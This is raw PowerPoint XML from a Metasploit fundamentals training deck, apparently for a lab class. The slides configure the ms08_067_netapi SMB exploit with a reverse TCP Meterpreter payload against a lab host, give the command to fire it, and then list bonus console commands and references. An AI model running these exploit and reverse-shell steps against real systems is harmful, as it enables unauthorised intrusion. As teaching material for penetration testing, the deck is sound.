            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  generic/</a:t>
            </a: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debug_trap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                              normal  Generic x86 Debug Trap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 {redacted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp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                 normal    Windows Meterpreter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1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dirty="0" smtClean="0"/>
              <a:t>Let’s use that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!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6812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MSF Console - Using Exploits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Add the payload (the reverse TCP Meterpreter payload will create a connection from the target back to your system and open a Meterpreter shell on the target):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msf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exploit(ms08_067_netapi) &gt;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set payload windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp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endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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pa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yload =&gt; windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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570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MSF Console - Using Exploits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Now we can see additional options available:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Module Options (exploit/windows/</a:t>
            </a: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smb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/ms08_067_netapi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):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name     Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RHOST    10.20.30.100     yes       The target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RPORT    445              yes       The SMB service port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Payload Options (windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp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):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name     </a:t>
            </a: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Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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EXITFUNC thread           yes       Exit technique (Accepted: ‘’, </a:t>
            </a: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seh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, thread, process, none)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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LHOST                     </a:t>
            </a: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yes       The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listen address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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LPORT    4444             </a:t>
            </a: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yes       The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listen port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  (redacted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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669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MSF Console - Using Exploits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Let’s set the LHOST to our IP address (we’ll use 10.20.30.200) and choose a less obvious port in th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e high range to listen on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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msf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exploit(ms08_067_netapi) &gt;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set LHOST 10.20.30.200</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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LHOST =&gt; 10.20.30.200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt; set LPORT 54321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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LPORT =&gt; 54321</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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29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MSF Console - Using Exploits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One last “show options” to sanity check:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Module Options (exploit/windows/</a:t>
            </a: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smb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/ms08_067_netapi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):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name     Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RHOST    10.20.30.100     yes       The target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RPORT    445              yes       The SMB service port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Payload Options (windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp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):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name     </a:t>
            </a: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Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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EXITFUNC thread           yes       Exit technique (Accepted: ‘’, </a:t>
            </a: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seh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, thread, process, none)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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LHOST    10.20.30.200     yes       </a:t>
            </a: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The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listen address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  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LPORT    54321            yes       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>The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listen port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  (redacted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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535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MSF Console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Firing The Missile!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At this point everything is setup and ready to go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> so get ready for part two, where we fire the missiles, exploit the system, and begin our work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re following along with the lab class you’ll have to wait for next week.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re doing this at home and have a vulnerable system at whatever address you set as a target you can jump ahead by just typing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf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 exploit(ms08_067_netapi) &gt; </a:t>
            </a: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</a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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023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Bonus Console Commands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While you’re waiting for next week here are a few additional commands that are useful (or just fun) to have on hand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wow your friends, and amaze your enemies!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7017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Bonus Command: Advanced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“advanced” command shows literally hundreds of additional options for the MSF that aren’t required in 99.99% of the cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To see them all just type “advanced” and review a quite lengthy list (specific to the exploit and/or payload you have selected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, while not generally needed this shows that the ms08_067_netapi module can use a defined SMB username, password, and domain.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7701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Bonus Command: Banner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Aren’t those banners that are randomly displayed when you start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> clever/funny/thought-provoking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t you wish you could see one on demand when you’re waiting for other things to happen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type “banner” and get a new one anytime!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1248541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Bonus Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setg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When you specify a setting it’s specific to the module in which you set it.  In other words, if you configured the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload module from this training with an LHOST value of “10.20.30.200” and then changed to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload you’d find that the LHOST value is not set (since you only set it for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” anywhere you normally might use “set” to make your setting global.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use this only when you know that it’s truly global, however.  Setting a global port can cause binding conflicts, for instance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118165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Bonus Command: grep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MSF natively supports grep, but the ordering is a bit off from what you might expect.  For example, if you were to do a case insensitive search within the results of ”some command” for “some text” it uses the following syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Linux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{some command} | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> {some text}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>MSF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grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> {some text} {some command}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seem a bit counter-intuitive to you?  See the next slide!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12893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Bonus Command: {ANY OS COMMAND}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Anything that you try to run that MSF doesn’t understand will be passed to your underlying operating system for evaluation as well!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try a simple “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” or “ls -la” for example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or how about ”{some command} | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> {some text}” instead? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>You’ll see the following text, followed by the output of your command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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[*] exec: {command}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>{results}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197797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Bonus Command: back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Want to back out of a selection (wherever that may be), or out of a managed session?  Just type “back” and you’re done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty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 exploit(ms08_067_netapi) </a:t>
            </a:r>
            <a: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&gt; back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> &gt;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3678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Bonus Command: help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When in doubt, ask for help!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type it by itself (e.g. “help”) to get a list of commands and their description.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type it followed by a command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g. “help grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”) to get detailed information on the options and switches for that command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type it followed by itself (e.g. ”help help”) for a fundamental truth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26158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68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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Unleased:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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://www.offensive-security.com/metasploit-unleashed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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: The Penetration Tester’s Guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Social Media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://twitter.com/metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Official account)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://twitter.com/egyp7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (James Lee, lead exploit developer/coder for MSF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://twitter.com/jduck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Josh Drake, former exploit developer for MSF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hermit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>twitter.com/hermit_hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.cryptolingus.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.stackattack.net/blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>/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5088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yptolingus_Presentation_Template" id="{A6F52B2C-CD49-C145-9E18-FB3C371D529E}" vid="{43F7E467-A391-6A43-8D79-0BC74E93249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Cryptolingus_Presentation_Template</Template>
  <TotalTime>5092</TotalTime>
  <Words>2508</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>286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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Metasploit Framework (MSF) Fundamentals</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>Common Terminology</vt:lpstr>
      <vt:lpstr>Common Terminology (continued)</vt:lpstr>
      <vt:lpstr>Common Terminology (continued)</vt:lpstr>
      <vt:lpstr>What is the Metasploit Framework?</vt:lpstr>
      <vt:lpstr>Why Use The MSF?</vt:lpstr>
